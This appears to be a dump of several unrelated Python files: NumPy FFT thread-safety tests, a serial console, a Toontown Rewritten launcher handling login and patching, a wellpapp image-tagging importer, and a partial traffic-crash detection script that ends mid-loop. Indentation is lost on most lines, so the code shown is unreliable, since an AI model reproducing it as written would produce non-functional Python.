assert_array_almost_equal(X_res, Y_res)
elif fft.__name__.endswith(('fft2', 'fftn')):
axes = [(0, 1), (1, 2), (0, 2)]
if fft.__name__.endswith('fftn'):
axes.extend([(0,), (1,), (2,), None])
for ax in axes:
X_res = fft(X, axes=ax)
Y_res = fft(Y, axes=ax)
assert_array_almost_equal(X_res, Y_res)
else:
raise ValueError
class TestFFTThreadSafe(object):
threads = 16
input_shape = (800, 200)
def _test_mtsame(self, func, *args):
def worker(args, q):
q.put(func(*args))
q = queue.Queue()
expected = func(*args)
# Spin off a bunch of threads to call the same function simultaneously
t = [threading.Thread(target=worker, args=(args, q))
for i in range(self.threads)]
[x.start() for x in t]
[x.join() for x in t]
# Make sure all threads returned the correct value
for i in range(self.threads):
assert_array_equal(q.get(timeout=5), expected,
'Function returned wrong value in multithreaded context')
def test_fft(self):
a = np.ones(self.input_shape) * 1+0j
self._test_mtsame(np.fft.fft, a)
def test_ifft(self):
a = np.ones(self.input_shape) * 1+0j
self._test_mtsame(np.fft.ifft, a)
def test_rfft(self):
a = np.ones(self.input_shape)
self._test_mtsame(np.fft.rfft, a)
def test_irfft(self):
a = np.ones(self.input_shape) * 1+0j
self._test_mtsame(np.fft.irfft, a)
|
console.py
|
#!/usr/bin/env python3
import os
import sys
import argparse
import serial
import threading
import time
def read_handler():
while True:
try:
b = serial_port.read()
s = b.decode('ascii')
except UnicodeDecodeError:
print(repr(b), end='')
pass
else:
print(s, end='')
sys.stdout.flush()
def write_handler():
while True:
l = sys.stdin.readline().strip()
print("*** sending '{}'".format(l))
ch = serial_port.write(l.encode('ascii'))
def main():
global serial_port
parser = argparse.ArgumentParser()
parser.add_argument("tty")
args = parser.parse_args()
try:
        for _ in range(0, 5):
            if not os.path.exists(args.tty):
                print("console.py: {} not found. Retrying in a few seconds...".format(args.tty))
                time.sleep(5)
            else:
                break
except KeyboardInterrupt:
sys.exit()
print("*** opening", args.tty)
serial_port = serial.Serial(args.tty, 115200, timeout=1)
print("*** listening", args.tty)
threading.Thread(target=write_handler, daemon=True).start()
threading.Thread(target=read_handler, daemon=True).start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
serial_port.close()
sys.exit()
if __name__ == '__main__':
main()
|
launcher.py
|
"""
TODO LIST:
- Get mirai python built with _ssl and bz2
- Fix up patcher.
- Graphical User Interface (inb4 python needs m0ar)
"""
from fsm.FSM import FSM
import urllib, json, sys, os, subprocess, threading, time, stat, getpass
import settings, localizer, messagetypes
from urllib.request import urlopen
from urllib.parse import urlencode
import os
import http.client as httplib
class TTRLauncher(FSM):
"""
This is the "main" class that powers the Toontown Rewritten launcher. It manages
everything the launcher needs to do, including manage all the "sub-threads" that
carry out tasks such as patching.
As of right now, the launcher consists of 3 threads:
- "main-thread": This is the thread which holds this class, and keeps everything
running properly. This also manages state transitions as well as submitting
data to and from the web server.
- "graphical": This thread will hold the GUI side of the launcher, such as abs
wyPython interface. Usually, this is what the end user will see when running the
launcher.
- "patcher": Since the majority of the patching process is locking, it has to be
run on a separate thread to keep the main thread alive. This thread will deal with
all the files it needs to download, as well as update/patch. During the download
process, the patcher will also report back the current download percentage of the
current file it is downloading.
ERR001: This occurs when the website returns broken JSON.
ERR002: This occurs when the website returns a Non-OK response when authenticating.
ERR003: We got a response, but the data received was invalid.
ERR004: The response said our login was invalid (failed).
ERR005: User tried to submit TFA code without entering anything.
ERR006: Account server is temporarily unavailable (HTTP 503).
"""
def __init__(self, input, output):
FSM.__init__(self)
self.input = input
self.output = output
self.transitions = {'Off': [
'CheckForUpdates', 'Off', 'LaunchGame'],
'CheckForUpdates': [
'Patch', 'Off'],
'GetCredentials': [
'SubmitCredentials', 'Off'],
'SubmitCredentials': [
'LoginResponse', 'Off'],
'LoginResponse': [
'GetCredentials', 'GetTFACode', 'Delayed', 'LaunchGame', 'Off'],
'GetTFACode': [
'SubmitTFACode', 'GetCredentials', 'Off'],
'SubmitTFACode': [
'LoginResponse', 'Off'],
'Delayed': [
'CheckQueue', 'Off'],
'CheckQueue': [
'LoginResponse', 'Off'],
'Patch': [
'GetCredentials', 'Off'],
'LaunchGame': [
'GetCredentials', 'Off']}
self.version = settings.Version
self.connection = None
self.gameserver = None
self.cookie = None
self.authToken = None
self.authBanner = None
self.appToken = None
self.queueToken = None
self.patcher = None
self.interface = None
self.credentials = None
self.dontClearMessage = False
return
def sendOutput(self, data):
self.output.put(data, block=True, timeout=0.5)
def start(self):
self.sendOutput((messagetypes.LAUNCHER_STATUS, ''))
self.request('CheckForUpdates')
def enterCheckForUpdates(self):
def versionCmp(v1, v2):
v1b = v1.split('.')
v2b = v2.split('.')
if len(v1b) != len(v2b):
return None
for i in range(len(v1b)):
v1bb = int(v1b[i])
v2bb = int(v2b[i])
if v1bb == v2bb:
pass
else:
if v1bb < v2bb:
return False
if v1bb > v2bb:
return True
return False
if self.version is not None:
pass
try:
data = urlopen(settings.JSONLauncherDict.get(sys.platform, settings.DefaultJSONLauncherInfo))
except:
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.UnableToCheckForUpdates))
self.dontClearMessage = True
self.request('Patch')
return
else:
try:
                data = json.loads(data.read().decode('utf-8'))
except:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR001: %s' % localizer.ERR_JSONParseError))
self.request('Patch')
return
            if versionCmp(data[0].get('version', '0.0.0'), self.version):
                self.sendOutput((
                    messagetypes.LAUNCHER_VERSION_UPDATE,
                    data[0].get('version'),
                    data[0].get('rnotes'),
                    data[0].get('update', settings.DefaultDownloadLocation)))
                self.request('Off')
                return
            self.request('Patch')
            return
def enterGetCredentials(self):
if self.dontClearMessage:
self.dontClearMessage = False
else:
self.sendOutput((messagetypes.LAUNCHER_STATUS, ''))
if self.credentials is None:
username, password = self.input.get(block=True, timeout=None)
self.credentials = (username, password)
else:
username, password = self.credentials
self.request('SubmitCredentials', username, password)
return
def enterSubmitCredentials(self, username, password):
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_Authing))
self.connection = httplib.HTTPSConnection(*settings.SSLConnection)
headers = {'Content-type': 'application/x-www-form-urlencoded'}
params = urlencode({'username': username.encode('utf8'),
'password': password.encode('utf8')})
self.connection.request('POST', settings.LoginPostLocation, params, headers)
self.request('LoginResponse')
def enterLoginResponse(self):
try:
response = self.connection.getresponse()
except httplib.BadStatusLine:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR006: %s' % localizer.ERR_AccServerDown))
self.credentials = None
self.request('GetCredentials')
else:
            if response.status == httplib.SERVICE_UNAVAILABLE:
                self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR006: %s' % localizer.ERR_AccServerDown))
                self.credentials = None
                self.request('GetCredentials')
                return
            if response.status != httplib.OK:
                self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR002: %s' % localizer.ERR_Non200Resp % {'response': str(response.status)}))
                self.credentials = None
                self.request('GetCredentials')
                return
            try:
                data = json.loads(response.read().decode('utf-8'))
            except:
                self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR001: %s' % localizer.ERR_JSONParseError))
                print("json parse error in area 1")
                self.request('Off')
                return
success = data.get('success', 'false')
self.connection.close()
self.connection = None
if success == 'true':
self.cookie = data.get('cookie', 'NoCookieGiven')
self.gameserver = data.get('gameserver', 'NoServerGiven')
self.request('LaunchGame')
else:
if success == 'false':
self.sendOutput((messagetypes.LAUNCHER_ERROR, data.get('banner', localizer.ERR_InvalidLogin)))
self.credentials = None
self.request('GetCredentials')
self.sendOutput(messagetypes.LAUNCHER_CLEAR_PASSWORD)
else:
if success == 'partial':
self.authToken = data.get('responseToken', None)
self.authBanner = data.get('banner', '')
self.request('GetTFACode')
else:
if success == 'delayed':
eta = int(data.get('eta', 5))
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_Queue % eta))
self.queueToken = data.get('queueToken', None)
self.request('Delayed', eta)
return
def enterGetTFACode(self):
        if self.authToken is None:
            self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR005: %s' % localizer.ERR_TFAWithoutToken))
            self.request('Off')
            return
        self.sendOutput((messagetypes.LAUNCHER_STATUS, ''))
        self.sendOutput((messagetypes.LAUNCHER_REQUEST_TFA, self.authBanner))
        self.appToken = self.input.get(block=True, timeout=None)
        if self.appToken is None:
            self.credentials = None
            self.request('GetCredentials')
            return
        self.request('SubmitTFACode')
return
def enterSubmitTFACode(self):
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_Authing))
self.connection = httplib.HTTPSConnection(*settings.SSLConnection)
headers = {'Content-type': 'application/x-www-form-urlencoded'}
params = urlencode({'appToken': self.appToken,
'authToken': self.authToken})
self.connection.request('POST', settings.LoginPostLocation, params, headers)
self.request('LoginResponse')
def enterDelayed(self, timeDelay):
        if self.queueToken is None:
            self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR007: %s' % localizer.ERR_DelayWithoutToken))
            self.request('Off')
            return
        time.sleep(max(timeDelay, 1))
self.request('CheckQueue')
return
def enterCheckQueue(self):
self.connection = httplib.HTTPSConnection(*settings.SSLConnection)
headers = {'Content-type': 'application/x-www-form-urlencoded'}
params = urlencode({'queueToken': self.queueToken})
self.connection.request('POST', settings.LoginPostLocation, params, headers)
self.request('LoginResponse')
def enterPatch(self):
from patcher import Patcher
self.patcher = threading.Thread(target=Patcher.Patch, name='Patcher-Thread', args=(self.__updateProgress, self.__updateFile))
self.patcher.daemon = True
self.patcher.start()
        while self.patcher.is_alive():
time.sleep(0.2)
self.request('GetCredentials')
def __updateProgress(self, percentage):
if self.output.empty():
self.sendOutput((messagetypes.LAUNCHER_PROGRESS, percentage))
def __updateFile(self, fileCount):
#if self.output.empty():
self.sendOutput((messagetypes.LAUNCHER_STATUS, fileCount))
def exitPatch(self):
self.sendOutput((messagetypes.LAUNCHER_PROGRESS, -1))
def enterLaunchGame(self):
os.environ['TTR_PLAYCOOKIE'] = self.cookie
os.environ['TTR_GAMESERVER'] = self.gameserver
if sys.platform == 'win32':
game = subprocess.Popen('TTREngine', creationflags=134217728)
else:
modes = os.stat('TTREngine').st_mode
if not modes & stat.S_IXUSR:
os.chmod('TTREngine', modes | stat.S_IXUSR)
game = subprocess.Popen('./TTREngine')
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_PlayGameFarewell))
time.sleep(1)
self.sendOutput(messagetypes.LAUNCHER_HIDE)
while game.poll() is None:
time.sleep(1.5)
os.system("/app/bin/wmclass") #Sets the WM_CLASS of Toontown Rewritten so that DE can show icon
if game.returncode == 0:
self.sendOutput(messagetypes.LAUNCHER_CLEAR_PASSWORD)
self.sendOutput(messagetypes.LAUNCHER_SHOW)
self.sendOutput(messagetypes.LAUNCHER_ENABLE_CONTROLS)
self.credentials = None
self.dontClearMessage = True
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_PlayAgain))
time.sleep(1.5)
self.request('GetCredentials')
return
self.sendOutput(messagetypes.LAUNCHER_SHOW)
self.sendOutput(messagetypes.LAUNCHER_PLAY_RETRY)
if self.input.get(block=True, timeout=None):
self.request('GetCredentials')
else:
self.request('Off')
return
def enterOff(self):
if self.connection is not None:
self.connection.close()
self.sendOutput(messagetypes.LAUNCHER_EXIT)
return
|
add.py
|
from __future__ import print_function
from __future__ import unicode_literals
from hashlib import md5
from PIL import Image
from io import BytesIO
from os.path import basename, dirname, realpath, exists, lexists, join, sep
from os import readlink, symlink, unlink, stat
from wellpapp import Client, VTstring, make_pdirs, RawWrapper, identify_raw, ExifWrapper, raw_exts, VTgps
from struct import unpack
from multiprocessing import Lock, cpu_count, Queue, Process, Manager
from traceback import print_exc
from sys import version_info, exit
from argparse import ArgumentParser
if version_info[0] == 2:
from Queue import Empty
from io import open
else:
from queue import Empty
def determine_filetype(data):
data2 = data[:2]
data3 = data[:3]
data4 = data[:4]
data6 = data[:6]
data8 = data[:8]
data16 = data[:16]
data48 = data[4:8]
if data3 == b"\xff\xd8\xff":
# probably jpeg, but I like to be careful.
if data[-2:] == b"\xff\xd9":
# this is how a jpeg should end
return "jpeg"
if data[-4:] == b"SEFT" and b"SEFH" in data[-100:] and b"\xff\xd9\x00\x00" in data[-256:]:
# samsung phones like to add this crap after the jpeg.
# no idea why it's not in a makernote, but here we are.
return "jpeg"
if data6 in (b"GIF87a", b"GIF89a") and data[-1:] == b";":
return "gif"
if data8 == b"\x89PNG\r\n\x1a\n" and data[12:16] == b"IHDR":
return "png"
if data2 == b"BM" and ord(data[5:6]) < 4 and data[13:14] == b"\x00":
return "bmp"
if data4 in (b"MM\x00*", b"II*\x00", b"IIRO", b"IIU\x00", b"FOVb", b"FUJI",):
return identify_raw(BytesIO(data))
flen = unpack("<I", data48)[0]
dlen = len(data)
if data3 == b"FWS" and flen == dlen:
return "swf"
if data3 == b"CWS" and dlen < flen < dlen * 10:
return "swf"
if data4 == b"RIFF" and data[8:12] == b"AVI " and flen < dlen < flen * 1.4 + 10240:
return "avi"
if data3 == b"\x00\x00\x01":
return "mpeg"
if data4 == b"\x1a\x45\xdf\xa3" and b"matroska" in data[:64]:
return "mkv"
if data4 == b"\x1a\x45\xdf\xa3" and b"webm" in data[:64]:
return "webm"
if data4 == b"OggS" and data[28:35] in (b"\x01video\x00", b"\x80theora"):
return "ogm"
if data16 == b"\x30\x26\xb2\x75\x8e\x66\xcf\x11\xa6\xd9\x00\xaa\x00\x62\xce\x6c":
return "wmv"
if data48 in (b"ftyp", b"mdat"):
blen = unpack(">I", data4)[0]
if data[blen + 4:blen + 8] == b"moov":
if data48 == b"mdat" or data[8:10] == b"qt":
return "mov"
else:
return "mp4"
if blen < 100 and (data[8:10] == b"qt" or data[8:12] in (b"3gp4", b"\0\0\0\0")):
return "mov"
if data[0:1] == b"\x00" and data[8:12] in (b"mp41", b"mp42", b"isom"):
return "mp4"
if data48 == b"moov" and data[12:16] in (b"mvhd", b"cmov"):
if b"\x00" in (data[0:1], data[8:9], data[16:17]):
return "mov"
if data4 == b"FLV\x01" and data[5:9] == b"\x00\x00\x00\x09" and ord(data[13:14]) in (8, 9, 18):
return "flv"
if data.startswith(b"%PDF-"):
return "pdf"
def _gpspos(pos, ref):
pos = pos[0] + pos[1] / 60 + pos[2] / 3600
if ref and ref[0] in "SWsw":
pos = -pos
return "%.7f" % (pos,)
def fmt_tagvalue(v):
if not v: return ""
if isinstance(v, VTstring):
return "=" + repr(v.str)
else:
return "=" + v.str
def flash_dimensions(data):
sig = data[:3]
assert sig in (b"FWS", b"CWS")
data = data[8:]
if sig == b"CWS":
from zlib import decompress
data = decompress(data)
pos = [0] # No "nonlocal" in python2
    def get_bits(n, signed=True):
        val = 0
        for i in range(n):
            sh = 7 - (pos[0] % 8)
            byte = data[pos[0] // 8]
            if not isinstance(byte, int):
                # Python 2: indexing a byte string yields a 1-char str
                byte = ord(byte)
            bit = (byte & (1 << sh)) >> sh
            if i == 0 and signed and bit:
                val = -1
            val = (val << 1) | bit
            pos[0] += 1
        return val
bpv = get_bits(5, False)
xmin = get_bits(bpv)
xmax = get_bits(bpv)
ymin = get_bits(bpv)
ymax = get_bits(bpv)
return [int(round(v / 20.0)) for v in (xmax - xmin, ymax - ymin)]
def mplayer_dimensions(fn):
from subprocess import Popen, PIPE, STDOUT
p = Popen(["mediainfo", "--Inform=Video;%Width% %Height%", fn],
stdout=PIPE, stderr=STDOUT, close_fds=True)
data = p.communicate()[0].split()
return tuple(map(int, data))
movie_ft = set("swf avi mpeg mkv ogm mp4 wmv flv mov webm".split())
def pdf_image(fn):
from subprocess import check_output
cmd = ["gs",
"-q",
"-sDEVICE=pngalpha",
"-sOutputFile=-",
"-dFirstPage=1",
"-dLastPage=1",
"-dBATCH",
"-dNOPAUSE",
"-dSAFER",
"-r100",
fn,
]
return check_output(cmd, close_fds=True)
def main(arg0, argv):
def needs_thumbs(m, ft):
if args.regenerate_thumbnail: return True
jpeg_fns, png_fns = client.thumb_fns(m, ft)
for fn, z in jpeg_fns + png_fns:
if not exists(fn): return True
def exif2tags(exif, tags):
cfg = client.cfg
if "lenstags" in cfg:
lenstags = cfg.lenstags.split()
for lt in lenstags:
if lt in exif:
v = exif[lt]
if isinstance(v, tuple) or hasattr(v, "pop"):
v = " ".join([str(e) for e in v])
lt = "lens:" + lt + ":" + v
if lt in cfg:
tags.add_spec(cfg[lt])
try:
make = exif["Exif.Image.Make"].strip()
model = exif["Exif.Image.Model"].strip()
cam = "camera:" + make + ":" + model
if cam in cfg:
tags.add_spec(cfg[cam])
except Exception:
pass
if "set_tags" in cfg:
for st in cfg.set_tags.split():
tn, et = st.split("=", 1)
if et in exif:
v = exif[et]
if ("FocalLength" in et or "FNumber" in et) and not v:
continue
tags.add_spec(tn + "=" + str(exif[et]))
if "Exif.GPSInfo.GPSLatitude" in exif:
lat = _gpspos(exif["Exif.GPSInfo.GPSLatitude"], exif["Exif.GPSInfo.GPSLatitudeRef"])
lon = _gpspos(exif["Exif.GPSInfo.GPSLongitude"], exif["Exif.GPSInfo.GPSLongitudeRef"])
if "Exif.GPSInfo.GPSAltitude" in exif:
from fractions import Fraction
alt = Fraction(exif["Exif.GPSInfo.GPSAltitude"])
if "Exif.GPSInfo.GPSAltitudeRef" in exif and float(exif["Exif.GPSInfo.GPSAltitudeRef"]):
alt = -alt
gps = VTgps("%s,%s,%.1f" % (lat, lon, alt))
else:
gps = VTgps("%s,%s" % (lat, lon))
tags.add(("aaaaaa-aaaadt-faketg-gpspos", gps))
if args.override_tags:
tags.add(("aaaaaa-aaaac8-faketg-bddate", exif.date(args.timezone)))
class tagset(set):
def add(self, t):
guid, val = t
prefix = ""
if guid[0] in "~-":
prefix = guid[0]
guid = guid[1:]
chk = (guid, "~" + guid)
rem = None
for v in self:
if v[0] in chk: rem = v
if rem: self.remove(rem)
if prefix != "-": set.add(self, (prefix + guid, val))
def difference(self, other):
other = {(guid, None if val is None else val.format()) for guid, val in other}
for guid, val in self:
if (guid, None if val is None else val.format()) not in other:
yield guid, val
def add_spec(self, s):
try:
with lock:
t = client.parse_tag(s)
except Exception:
print("Failed to parse: " + s)
return
if t:
self.add(t)
else:
print("Unknown tag " + s)
def update(self, l):
[self.add_spec(s) for s in l]
def update_tags(self, l):
[self.add((t.pguid, t.value)) for t in l]
def find_tags(fn):
path = "/"
tags = tagset()
if client.cfg.tags_filename:
for dir in dirname(fn).split(sep):
path = join(path, dir)
TAGS = join(path, client.cfg.tags_filename)
if exists(TAGS):
tags.update(open(TAGS, "r", encoding="utf-8").readline().split())
if args.tags_from_fn:
tags.update(basename(fn).split()[:-1])
return tags
def record_filename(m, fn):
dn = client.image_dir(m)
rec_fn = join(dn, "FILENAMES")
known = {}
if exists(rec_fn):
for line in open(rec_fn, "r", encoding="utf-8", errors="backslashreplace"):
r_m, r_fn = line[:-1].split(" ", 1)
known.setdefault(r_m, []).append(r_fn)
if m not in known or fn not in known[m]:
with lock:
with open(rec_fn, "a", encoding="utf-8", errors="backslashreplace") as fh:
fh.write(m + " " + fn + "\n")
def generate_cache(m, fn, jz):
cache_fn = client.cfg.image_base + "/cache"
if exists(cache_fn):
s = stat(fn)
z = s.st_size
mt = int(s.st_mtime)
if jz:
l = "1 %s %d %d %d %s\n" % (m, z, mt, jz, fn)
else:
l = "0 %s %d %d %s\n" % (m, z, mt, fn)
with lock:
with open(cache_fn, "a", encoding="utf-8") as fh:
fh.write(l)
def add_image(fn, m, data, warn_q):
fn = realpath(fn)
with lock:
post = client.get_post(m, True)
if post:
ft = post.ext
else:
ft = args.type or determine_filetype(data)
assert ft
p = client.image_path(m)
if lexists(p):
ld = readlink(p)
is_wpfs = False
try:
dot = fn.rindex(".")
if "/" not in fn[dot:]:
bare_fn = fn[:fn.rindex(".")]
if m == bare_fn[-32:] and readlink(bare_fn)[-32:] == m:
is_wpfs = True # probably
except (OSError, ValueError):
pass
if is_wpfs:
if not args.quiet:
print("Not updating", fn, "because this looks like a wellpappfs")
elif exists(p):
if fn != ld:
if not args.dummy: record_filename(m, fn)
if not args.quiet:
print("Not updating", m, fn)
else:
if args.dummy:
if not args.quiet: print("Would have updated", m, fn)
else:
record_filename(m, ld)
if not args.quiet: print("Updating", m, fn)
unlink(p)
do_cache = False
if not lexists(p) and not args.dummy:
make_pdirs(p)
symlink(fn, p)
do_cache = True
if not post or needs_thumbs(m, ft):
do_cache = True
if ft in movie_ft:
if not args.thumb_src:
print("Can't generate " + ft + " thumbnails")
exit(1)
if not post:
if ft == "swf":
w, h = flash_dimensions(data)
else:
w, h = mplayer_dimensions(fn)
else:
if ft == "pdf":
data = pdf_image(fn)
datafh = RawWrapper(BytesIO(data))
try:
img = Image.open(datafh)
except IOError:
if args.thumb_src:
img = Image.open(RawWrapper(open(args.thumb_src, "rb")))
print("Warning: taking dimensions from thumb source")
else:
raise
w, h = img.size
if do_cache and not args.dummy:
if ft in raw_exts:
jfh = RawWrapper(BytesIO(data), True)
jfh.seek(0, 2)
jz = jfh.tell()
jfh.close()
else:
jz = None
generate_cache(m, fn, jz)
exif = ExifWrapper(fn)
if not post:
rot = exif.rotation()
if rot in (90, 270): w, h = h, w
kw = {"md5": m, "width": w, "height": h, "ext": ft}
if rot >= 0: kw["rotate"] = rot
date = exif.date(args.timezone)
if date:
kw["imgdate"] = date
if args.dummy:
print("Would have created post " + m)
else:
with lock:
client.add_post(**kw)
if needs_thumbs(m, ft):
if args.dummy:
print("Would have generated thumbs for " + m)
else:
rot = exif.rotation()
if args.thumb_src:
img = Image.open(RawWrapper(open(args.thumb_src, "rb")))
client.save_thumbs(m, img, ft, rot, args.regenerate_thumbnail)
full = tagset()
weak = tagset()
with lock:
post = client.get_post(m, True)
posttags = tagset()
if post:
posttags.update_tags(post.tags)
filetags = find_tags(fn)
try:
exif2tags(exif, filetags)
except Exception:
print_exc()
warn_q.put(fn + ": failed to set tags from exif")
for guid, val in filetags.difference(posttags):
            if post and guid in post.tags and not args.override_tags:
print("Not overriding value on", post.tags[guid].pname)
elif guid[0] == "~":
weak.add((guid[1:], val))
else:
full.add((guid, val))
if full or weak:
with lock:
if args.no_tagging or args.dummy:
full = [client.get_tag(g).name + fmt_tagvalue(v) for g, v in full]
weak = ["~" + client.get_tag(g).name + fmt_tagvalue(v) for g, v in weak]
print("Would have tagged " + m + " " + " ".join(full + weak))
else:
client.tag_post(m, full, weak)
parser = ArgumentParser(prog=arg0)
parser.add_argument('-v', '--verbose', action="store_true")
parser.add_argument('-q', '--quiet', action="store_true")
parser.add_argument('-f', '--regenerate-thumbnail', action="store_true")
parser.add_argument('-n', '--no-tagging', action="store_true", help='prints what would have been tagged')
parser.add_argument('-g', '--tags-from-fn', action="store_true", help='generate tags from filename (all words except last)')
parser.add_argument('-d', '--dummy', action="store_true", help='only print what would be done')
parser.add_argument('-t', '--thumb-src', help='post or file to generate thumb from')
parser.add_argument('-T', '--type', help='override file type detection')
parser.add_argument('-z', '--timezone', help='timezone to assume EXIF dates are in (+-HHMM format)')
parser.add_argument('-o', '--override-tags', action="store_true", help='override existing tag values (from exif, TAGS (and filename))')
parser.add_argument('filename', nargs='+')
args = parser.parse_args(argv)
if args.thumb_src:
args.regenerate_thumbnail = True
client = Client()
lock = Lock()
if args.thumb_src:
if len(args.filename) > 1:
print("Only add one post with -t")
exit(1)
if not exists(args.thumb_src):
m = client.postspec2md5(args.thumb_src)
args.thumb_src = client.image_path(m)
if not exists(args.thumb_src):
print("Thumb source not found")
exit(1)
client.begin_transaction()
q = Queue()
bad_q = Queue()
warn_q = Queue()
for td in args.filename:
q.put(td)
in_progress = Manager().dict() # no set available
def worker():
while True:
try:
i = q.get(False)
except Empty:
break
try:
                if isinstance(i, tuple):
                    # re-queued entry: md5 already known, but the file data must be re-read
                    i, m = i
                    data = open(i, "rb").read()
                else:
                    if args.verbose:
                        print(i)
                    data = open(i, "rb").read()
                    m = md5(data).hexdigest()
with lock:
if m in in_progress:
# try again later, keep the md5
# (don't just skip it, because tags may be different)
q.put((i, m))
continue
in_progress[m] = True
try:
add_image(i, m, data, warn_q)
finally:
with lock:
del in_progress[m]
except Exception:
print_exc()
bad_q.put(i)
# I would have used Pool, but it's completely broken if you ^C
ps = [Process(target=worker) for _ in range(min(cpu_count(), len(args.filename)))]
for p in ps:
p.daemon = True
p.start()
for p in ps:
p.join()
client.end_transaction()
def print_q(q, msg):
if not q.empty():
print()
print(msg)
while True:
try:
print("\t%s" % (q.get(False),))
except Empty:
break
print_q(warn_q, "Files with warnings:")
print_q(bad_q, "Failed files:")
|
Debug.py
|
from time import time
import cv2
import numpy as np
from Mosse_Tracker.TrackerManager import Tracker, TrackerType
from PIL import Image
#from Car_Detection_TF.yolo import YOLO
#from Car_Detection.detect import Yolo_image
from Mosse_Tracker.utils import draw_str
from boxes.yoloFiles import loadFile
pi=22/7
# clf = pickle.load(open('VIF/model-svm1.sav', 'rb'))
total_frames = []
counter_sub_video = 1
data = []
from VIF.vif import VIF
vif = VIF()
tracker_type = TrackerType.MOSSE
def predict(frames_RGB,trackers):
gray_frames = []
for frame in frames_RGB:
gray_frames.append(cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY))
no_crash = 0
crash = 0
for tracker in trackers:
tracker_frames,width,height,xmin,xmax,ymin,ymax = tracker.getFramesOfTracking(gray_frames)
        if tracker_frames is None:
continue
# if xmax - xmin < 100:
# continue
#
# print("ymax"+str(ymax - ymin))
#
# print("xmax"+str(xmax - xmin))
#
# print("ymax/x"+str((ymax- ymin) / (xmax - xmin)))
if xmax - xmin < 50: #50
continue
if ymax - ymin <= 28: #35
continue
if (ymax- ymin) / (xmax - xmin) <0.35: #0.35
continue
feature_vec = vif.process(tracker_frames)
result = vif.clf.predict(feature_vec.reshape(1, 304))
if result[0] == 0.0:
no_crash += 1
else:
crash += 1
# trackers[0].saveTracking(frames_RGB)
# trackers[1].saveTracking(frames_RGB)
tracker.saveTracking(frames_RGB)
# print(crash, no_crash)
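# checkDistance() below flags a possible collision between two tracked vehicles:
# it only applies when at least one tracker is above the speed limit, then it
# compares the distance r between the two *estimated* future centers with how far
# each tracker's actual center drifted from its own estimate. A small r combined
# with a large relative drift (max_difference / r > 0.5) indicates an abrupt,
# unexpected change of trajectory, i.e. a crash candidate.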
def checkDistance(frames,tracker_A,tracker_B,frame_no):
if not tracker_A.isAboveSpeedLimit(frame_no-10,frame_no) and not tracker_B.isAboveSpeedLimit(frame_no-10,frame_no) :
return False
xa, ya = tracker_A.estimationFutureCenter[frame_no]
xb, yb = tracker_B.estimationFutureCenter[frame_no]
r = pow(pow(xa - xb, 2) + pow(ya - yb, 2), 0.5)
tracker_A_area = 0.5 * tracker_A.width * tracker_A.height
    tracker_B_area = 0.5 * tracker_B.width * tracker_B.height
# iou = intersectionOverUnion(tracker_A.tracker.getCutFramePosition((xa,ya)),tracker_B.tracker.getCutFramePosition((xb,yb)))
# iou2 = intersectionOverUnion(tracker_B.tracker.getCutFramePosition((xa, ya)),
# tracker_A.tracker.getCutFramePosition(tracker_A.tracker.center))
if tracker_type == TrackerType.MOSSE:
xa_actual,ya_actual = tracker_A.tracker.centers[frame_no]
xb_actual,yb_actual = tracker_B.tracker.centers[frame_no]
else:
xa_actual,ya_actual = tracker_A.get_position(tracker_A.history[frame_no])
xb_actual,yb_actual = tracker_B.get_position(tracker_B.history[frame_no])
difference_trackerA_actual_to_estimate = pow(pow(xa_actual - xa, 2) + pow(ya_actual - ya, 2), 0.5)
difference_trackerB_actual_to_estimate = pow(pow(xb_actual - xb, 2) + pow(yb_actual - yb, 2), 0.5)
max_difference = max(difference_trackerA_actual_to_estimate,difference_trackerB_actual_to_estimate)
# print(r,difference_trackerA_actual_to_estimate,difference_trackerB_actual_to_estimate,max_difference/r)
if r == 0:
return True
if r < 40 and max_difference/r > 0.5:
# print(r,difference_trackerA_actual_to_estimate,difference_trackerB_actual_to_estimate,max_difference/r)
return True
return False
def process(trackers,frames):
# predict(frames, trackers)
new_trackers = trackers
# for tracker in trackers:
# if tracker.isAboveSpeedLimit():
# new_trackers.append(tracker)
for i in range(len(new_trackers)):
for j in range(i+1,len(trackers)):
if i == j:
continue
tracker_A = trackers[i]
tracker_B = trackers[j]
if checkDistance(frames,tracker_A,tracker_B,16) or checkDistance(frames,tracker_A,tracker_B,19) or checkDistance(frames,tracker_A,tracker_B,22) or checkDistance(frames,tracker_A,tracker_B,25) or checkDistance(frames,tracker_A,tracker_B,28):
# tracker_A.saveTracking(frames)
# print("Maybe an accident has occured!")
predict(frames, [tracker_B,tracker_A])
class MainFlow:
def __init__(self, yolo, fromFile=True, select=False):
self.yolo = yolo
self.frameCount = 0
self.readFile = fromFile
# if select == False then use TF else use PYTORCH
self.selectYOLO = select
self.trackerId = 0
def run(self, path):
global total_frames
last_30_frames = []
last_delayed_30_frames = []
fileBoxes = []
new_frame = None
if self.readFile:
fileBoxes = loadFile(path)
# model = ''
# if self.selectYOLO:
# model = Darknet("Car_Detection/config/yolov3.cfg", CUDA=False)
# model.load_weight("Car_Detection/config/yolov3.weights")
cap = cv2.VideoCapture(path)
#frame_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
#frame_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
frame_width = 480
frame_height = 360
trackers = []
delayed_trackers = []
# run yolo every fps frames
fps = 30
hfps = 15
no_of_frames = 0
paused = False
cum_time = 0
while True:
if not paused:
t = time()
# read new frame
ret, frame = cap.read()
# if ret and no_of_frames <120:
# no_of_frames+=1
# continue
if ret:
dim = (480, 360)
frame = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)
#frame = cv2.GaussianBlur(frame, (-1, -1), 1.0) # 2.0
new_frame = frame.copy()
total_frames.append(new_frame)
# failed to get new frame
else:
break
# run ViF
